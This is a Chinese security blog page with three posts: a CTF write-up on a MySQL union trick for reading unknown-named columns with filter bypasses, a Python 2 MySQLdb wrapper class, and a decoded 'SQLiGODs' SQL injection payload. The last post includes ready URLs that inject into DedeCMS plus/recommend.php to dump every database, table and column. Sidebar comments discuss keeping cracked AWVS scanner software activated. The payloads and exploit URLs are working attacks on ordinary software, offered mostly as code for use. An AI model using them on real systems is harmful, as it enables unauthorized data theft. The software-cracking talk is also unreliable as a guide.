Mysql巧妙绕过未知字段名的技巧

发布时间:May 29, 2017 // 分类:转帖文章,mysql // No Comments

DDCTF第五题,绕过未知字段名的技巧,这里拿本机来操作了下,思路很棒也很清晰,分享给大家。题目过滤空格和逗号,空格使用%0a,%0b,%0c,%0d,%a0,或者直接使用括号都可以绕过,逗号使用join绕过;

存放flag的字段名未知,information_schema.columns也将表名的hex过滤了,即获取不到字段名;这时可以利用联合查询,过程如下:

思想就是获取flag,让其在已知字段名下出现;

mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;

+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d
union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)

from:secquan

兔大侠整理的MySQLdb Python封装类

发布时间:September 13, 2015 // 分类:开发笔记,工作日志,运维工作,linux,代码学习,python,windows,mysql // No Comments

我一直没弄明白一件事情,Python语言已经这么流行和成熟了,为什么使用MySQL的方式却如此原始。Python 2下大家推崇的依旧是使用MySQLdb这个第三方的模块,而其使用方式还是手写方法,没有一个比较权威的封装类。或许是我孤陋寡闻?

根据官方文档及一些网上的样例,兔哥整理了一个MySQLdb的封装类。基本上涵盖了常用的函数,一般开发应该够用了。

#!/usr/bin/env python
# -*- coding: utf-8 -*- 
u'''对MySQLdb常用函数进行封装的类
 
 整理者:兔大侠和他的朋友们(http://www.tudaxia.com)
 日期:2014-04-22
 出处:源自互联网,共享于互联网:-)
 
 注意:使用这个类的前提是正确安装 MySQL-Python模块。
 官方网站:http://mysql-python.sourceforge.net/
'''

import MySQLdb
import time

class MySQL:
    u'''对MySQLdb常用函数进行封装的类'''
    
    error_code = '' #MySQL错误号码

    _instance = None #本类的实例
    _conn = None # 数据库conn
    _cur = None #游标

    _TIMEOUT = 30 #默认超时30秒
    _timecount = 0
        
    def __init__(self, dbconfig):
        u'构造器:根据数据库连接参数,创建MySQL连接'
        try:
            self._conn = MySQLdb.connect(host=dbconfig['host'],
                                         port=dbconfig['port'], 
                                         user=dbconfig['user'],
                                         passwd=dbconfig['passwd'],
                                         db=dbconfig['db'],
                                         charset=dbconfig['charset'])
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            error_msg = 'MySQL error! ', e.args[0], e.args[1]
            print error_msg
            
            # 如果没有超过预设超时时间,则再次尝试连接,
            if self._timecount < self._TIMEOUT:
                interval = 5
                self._timecount += interval
                time.sleep(interval)
                return self.__init__(dbconfig)
            else:
                raise Exception(error_msg)
        
        self._cur = self._conn.cursor()
        self._instance = MySQLdb

    def query(self,sql):
        u'执行 SELECT 语句'     
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result

    def update(self,sql):
        u'执行 UPDATE 及 DELETE 语句'
        try:
            self._cur.execute("SET NAMES utf8") 
            result = self._cur.execute(sql)
            self._conn.commit()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            print "数据库错误代码:",e.args[0],e.args[1]
            result = False
        return result
        
    def insert(self,sql):
        u'执行 INSERT 语句。如主键为自增长int,则返回新生成的ID'
        try:
            self._cur.execute("SET NAMES utf8")
            self._cur.execute(sql)
            self._conn.commit()
            return self._conn.insert_id()
        except MySQLdb.Error, e:
            self.error_code = e.args[0]
            return False
    
    def fetchAllRows(self):
        u'返回结果列表'
        return self._cur.fetchall()

    def fetchOneRow(self):
        u'返回一行结果,然后游标指向下一行。到达最后一行以后,返回None'
        return self._cur.fetchone()
 
    def getRowCount(self):
        u'获取结果行数'
        return self._cur.rowcount
                          
    def commit(self):
        u'数据库commit操作'
        self._conn.commit()
                        
    def rollback(self):
        u'数据库回滚操作'
        self._conn.rollback()
           
    def __del__(self): 
        u'释放资源(系统GC自动调用)'
        try:
            self._cur.close() 
            self._conn.close() 
        except:
            pass
        
    def  close(self):
        u'关闭数据库连接'
        self.__del__()
 

if __name__ == '__main__':
    '''使用样例'''
    
    #数据库连接参数  
    dbconfig = {'host':'localhost', 
                'port': 3306, 
                'user':'dbuser', 
                'passwd':'dbpassword', 
                'db':'testdb', 
                'charset':'utf8'}
    
    #连接数据库,创建这个类的实例
    db = MySQL(dbconfig)
    
    #操作数据库
    sql = "SELECT * FROM `sample_table`"
    db.query(sql);
    
    #获取结果列表
    result = db.fetchAllRows();
    
    #相当于php里面的var_dump
    print result
    
    #对行进行循环
    for row in result:
        #使用下标进行取值
        #print row[0]
        
        #对列进行循环
        for colum in row:
            print colum
 
    #关闭数据库
    db.close()

 

从SQLiGODS里面得到的一点tips

发布时间:April 26, 2015 // 分类:代码学习,mysql // No Comments

Referer:http://zone.wooyun.org/content/16039

这里介绍了一个exp,可以一次性dump出全部的数据。之前一直感觉很强大,各种膜拜。后来接触一段时间后打算深入地研究下具体的过程。于是有了此文

concat(0x3c7363726970743e6e616d653d70726f6d70742822506c6561736520456e74657220596f7572204e616d65203a2022293b2075726c3d70726f6d70742822506c6561736520456e746572205468652055726c20796f7527726520747279696e6720746f20496e6a65637420616e6420777269746520276d616b6d616e2720617420796f757220496e6a656374696f6e20506f696e742c204578616d706c65203a20687474703a2f2f736974652e636f6d2f66696c652e7068703f69643d2d3420554e494f4e2053454c45435420312c322c332c636f6e6361742830783664363136622c6d616b6d616e292c352d2d2b2d204e4f5445203a204a757374207265706c61636520796f757220496e6a656374696f6e20706f696e742077697468206b6579776f726420276d616b6d616e2722293b3c2f7363726970743e,0x3c623e3c666f6e7420636f6c6f723d7265643e53514c69474f44732053796e746178205620312e30204279204d616b4d616e3c2f666f6e743e3c62723e3c62723e3c666f6e7420636f6c6f723d677265656e2073697a653d343e496e6a6563746564206279203c7363726970743e646f63756d656e742e7772697465286e616d65293b3c2f7363726970743e3c2f666f6e743e3c62723e3c7461626c6520626f726465723d2231223e3c74723e3c74643e44422056657273696f6e203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,version(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e2044422055736572203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,user(),0x203c2f666f6e743e3c2f74643e3c2f74723e3c74723e3c74643e5072696d617279204442203a203c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75653e20,database(),0x203c2f74643e3c2f74723e3c2f7461626c653e3c62723e,0x3c666f6e7420636f6c6f723d626c75653e43686f6f73652061207461626c652066726f6d207468652064726f70646f776e206d656e75203a203c2f666f6e743e3c62723e,concat(0x3c7363726970743e66756e6374696f6e20746f48657828737472297b76617220686578203d27273b666f722876617220693d303b693c7374722e6c656e6774683b692b2b297b686578202b3d2027272b7374722e63686172436f646541742869292e746f537472696e67283136293b7d72657475726e206865783b7d66756e6374696f6e2072656469726563742873697465297b6d616b73706c69743d736974652e73706c697428222e22293b64626e616d653d6d616b73706c69745b305d3b74626c6e616d653d6d616b73706c69745b315d3b6d616b7265703d22636f6e636174284946284074626c3a3d3078222b746f4865782874626c6e616d65292b222c3078302c307830292c4946284064623a3d3078222b746f4865782864626e616d65292b222c3078302c307830292c636f6e6361742830783363373336333732363937303734336537353732366333643232222b746f4865782875726c292b2232323362336332663733363337323639373037343365292c636f6e63617428636f6e6361742830783363373336333732363937303734336536343632336432322c4064622c307832323362373436323663336432322c4074626c2c3078323233623363326637333633373236393730373433652c30783363363233653363363636663665373432303633366636633666373233643732363536343365323035333531346336393437346634343733323035333739366537343631373832303536323033313265333032303432373932303464363136623464363136653363326636363666366537343365336336323732336533633632373233653534363136323663363532303465363136643635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4074626c2c3078336332663636366636653734336532303636373236663664323036343631373436313632363137333635323033613230336336363666366537343230363336663663366637323364363236633735363533652c4064622c307833633266363636663665373433653363363237323365346537353664363236353732323034663636323034333666366337353664366537333230336132303363363636663665373432303633366636633666373233643632366337353635336533633733363337323639373037343365363336663663363336653734336432322c2853454c45435420636f756e7428636f6c756d6e5f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e636f6c756d6e73207768657265207461626c655f736368656d613d40646220616e64207461626c655f6e616d653d4074626c292c3078323233623634366636333735366436353665373432653737373236393734363532383633366636633633366537343239336233633266373336333732363937303734336533633266363636663665373433652c307833633632373233652c2873656c65637420284078292066726f6d202873656c656374202840783a3d30783030292c284063686b3a3d31292c202873656c656374202830292066726f6d2028696e666f726d6174696f6e5f736368656d612e636f6c756d6e732920776865726520287461626c655f736368656d613d3078222b746f4865782864626e616d65292b222920616e6420287461626c655f6e616d653d3078222b746f4865782874626c6e616d65292b222920616e642028307830302920696e202840783a3d636f6e6361745f777328307832302c40782c4946284063686b3d312c30783363373336333732363937303734336532303633366636633665363136643635323033643230366536353737323034313732373236313739323832393362323037363631373232303639323033643230333133622c30783230292c30783230363336663663366536313664363535623639356432303364323032322c636f6c756d6e5f6e616d652c307832323362323036393262326233622c4946284063686b3a3d322c307832302c30783230292929292978292c30783636366637323238363933643331336236393363336436333666366336333665373433623639326232623239376236343666363337353664363536653734326537373732363937343635323832323363363636663665373432303633366636633666373233643637373236353635366533653232326236393262323232653230336332663636366636653734336532323262363336663663366536313664363535623639356432623232336336323732336532323239336237643363326637333633373236393730373433652c636f6e6361742830783363363233652c307833633733363337323639373037343365373137353635373237393364323232323362363636663732323836393364333133623639336336333666366336333665373433623639326232623239376237313735363537323739336437313735363537323739326236333666366336653631366436353562363935643262323232633330373833323330333336313333363133323330326332323362376437353732366333643735373236633265373236353730366336313633363532383232323732323263323232353332333732323239336236343664373037313735363537323739336437353732366332653732363537303663363136333635323832323664363136623664363136653232326332323238373336353663363536333734323834303239323036363732366636643238373336353663363536333734323834303361336433303738333033303239323032633238373336353663363536333734323032383430323932303636373236663664323832323262363436323262323232653232326237343632366332623232323937373638363537323635323834303239323036393665323032383430336133643633366636653633363137343566373737333238333037383332333032633430326332323262373137353635373237393262323233303738333336333336333233373332333336353239323932393239363132393232323933623634366636333735366436353665373432653737373236393734363532383232336336313230363837323635363633643237323232623634366437303731373536353732373932623232323733653433366336393633366232303438363537323635323037343666323034343735366437303230373436383639373332303737363836663663363532303534363136323663363533633631336532323239336233633266373336333732363937303734336529292929223b75726c3d75726c2e7265706c616365282227222c2225323722293b75726c706173313d75726c2e7265706c61636528226d616b6d616e222c6d616b726570293b77696e646f772e6f70656e2875726c70617331293b7d3c2f7363726970743e3c73656c656374206f6e6368616e67653d22726564697265637428746869732e76616c756529223e3c6f7074696f6e2076616c75653d226d6b6e6f6e65222073656c65637465643e43686f6f73652061205461626c653c2f6f7074696f6e3e,(select (@x) from (select (@x:=0x00), (select (0) from (information_schema.tables) where (table_schema!=0x696e666f726d6174696f6e5f736368656d61) and (0x00) in (@x:=concat(@x,0x3c6f7074696f6e2076616c75653d22,UNHEX(HEX(table_schema)),0x2e,UNHEX(HEX(table_name)),0x223e,UNHEX(HEX(concat(0x4461746162617365203a3a20,table_schema,0x203a3a205461626c65203a3a20,table_name))),0x3c2f6f7074696f6e3e))))x),0x3c2f73656c6563743e),0x3c62723e3c62723e3c62723e3c62723e3c62723e)

顺便把这个exp给解码了,发现一点有意思的



<script> name=prompt("Please Enter Your Name : "); url=prompt("Please Enter The Url you're trying to Inject and write 'makman' at your Injection Point, Example : http://site.com/file.php?id=-4 UNION SELECT 1,2,3,concat(6d616b,makman),5—+- NOTE : Just replace your Injection point with keyword 'makman'"); </script> , //熟悉的开始地方 <b> <font color=red>SQLiGODs Syntax V 1.0 By MakMan</font><br><br> <font color=green size=4>Injected by <script>document.write(name);</script></font><br> <table border="1"> <tr><td>DB Version : </td> <td><font color=blue> ,version(), </font></td></tr> //version() <tr><td> DB User : </td> <td><font color=blue> ,user(), </font></td></tr> //user() <tr><td>Primary DB : </td> <td><font color=blue> ,database(), </td></tr></table> <br>, //database() <font color=blue>Choose a table from the dropdown menu : </font> <br>,concat( <script> function toHex(str){ //转换为16进制 var hex =''; for(var i=0;i<str.length;i++){ hex += ''+str.charCodeAt(i).toString(16); } return hex; } function redirect(site){ maksplit=site.split("."); dbname=maksplit[0]; tblname=maksplit[1]; makrep="concat( IF(@tbl:="+toHex(tblname)+",0,0), IF(@db:="+toHex(dbname)+",0,0), concat( <script> url=""+toHex(url)+""; //对url进行编码 </script>),concat(concat( <script>db=",@db,";tbl=",@tbl,";</script>,<b> <font color=red> SQLiGODs Syntax V 1.0 By MakMan</font><br><br> Table Name : <font color=blue>,@tbl,</font> from database : <font color=blue>,@db,</font> <br>Number Of Columns : <font color=blue> <script> colcnt=",(SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl),"; //SELECT count(column_name) from information_schema.columns where table_schema=@db and table_name=@tbl //查询某个表的数目 document.write(colcnt);</script> </font>,<br>, (select (@x) from (select (@x:=00),(@chk:=1), (select (0) from (information_schema.columns) where (table_schema="+toHex(dbname)+") and (table_name="+toHex(tblname)+") and (00) in (@x:=concat_ws(20,@x,IF(@chk=1, <script> colname = new Array(); var i = 1;,20), colname[i] = ",column_name,"; i++;,IF(@chk:=2,20,20)))))x),for(i=1;i<=colcnt;i++){ document.write("<font color=green>"+i+". </font>"+colname[i]+"<br>");}</script> , concat(<b>,<script>query="";for(i=1;i<colcnt;i++){ // query=query+colname[i]+", :: ,"; } url=url.replace("'","%27"); dmpquery=url.replace("makman","(select(@) from(select(@:=00) ,(select (@) from("+db+"."+tbl+")where(@) in (@:=concat_ws(20,@,"+query+"<br>))))a)"); //把makman替换为sql语句,这里就是我们需要查询的关键了 document.write("<a href='"+dmpquery+"'>Click Here to Dump this whole Table<a>");</script>))))"; url=url.replace("'","%27"); urlpas1=url.replace("makman",makrep); window.open(urlpas1); } </script> <select onchange="redirect(this.value)"> <option value="mknone" selected>Choose a Table</option>, (select (@x) from (select (@x:=00), (select (0) from (information_schema.tables) where (table_schema!=information_schema) and (00) in (@x:=concat(@x, <option value=",UNHEX(HEX(table_schema)),.,UNHEX(HEX(table_name)),">,UNHEX(HEX(concat(Database :: ,table_schema, :: Table :: ,table_name))),</option>))))x),</select>), <br><br><br><br><br>

把这个拆解开来,发现了其中的关键部分就是

select(@) from(select(@:=00) ,(select (@) from(&quot;+db+&quot;.&quot;+tbl+&quot;)where(@) in (@:=concat_ws(20,@,&quot;+query+&quot;

然后自己本地测试发现的是这样子的

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema)))))x

列出全部的库

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name)))))x

列出全部的表

 

然后列出全部的库,表,字段就是这样子了

SELECT @ FROM (SELECT @:=0,(SELECT @ FROM information_schema.columns WHERE @ IN (@:=CONCAT(@, 0x0a,concat_ws(0x3a,table_schema,table_name,column_name))) ) )x

数据太多,直接超时了

 

PS:当然这个的风险是很大的,比如我的CPU硬生生的耗完了

用到注入的地方,就是这样子。比如我们平时的都是这么注入的

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

利用上面的办法,我们来撸出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&amp;_FILES[type][name]&amp;_FILES[type][size]&amp;_FILES[type][type]&amp;_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name)))))x),5,6,7,8,9%23

当然还可以一次性列出全部的表还有字段

http://xxx.xxx.xxx.xxx//plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa%5c%27and+char(@`%27`)+/*!50000Union*/+/*!50000SeLect*/+1,2,3,(SELECT%20@%20FROM%20(SELECT%20@:=0,(SELECT%20@%20FROM%20information_schema.columns%20WHERE%20@%20IN%20(@:=CONCAT(@,%200x0a,concat_ws(0x3a,table_schema,table_name,column_name)))))x),5,6,7,8,9%2

相关文档:

分类
最新文章
最近回复
  • 没穿底裤: 直接在hosts里面.激活的时候访问不到正确的地址
  • Sfish: 屏蔽更新是在控制台设置一下就可以了,还是说要在其他层面做一下限制,比如配置一下hosts让他升...
  • 没穿底裤: 激活,或者屏蔽地址禁止升级
  • 没穿底裤: 呃..这个思路不错啊..
  • Sfish: 博主好,想问一下,wvs11的破解版,是不是每隔一段时间就要重新激活一次才可以?有没有什么解决...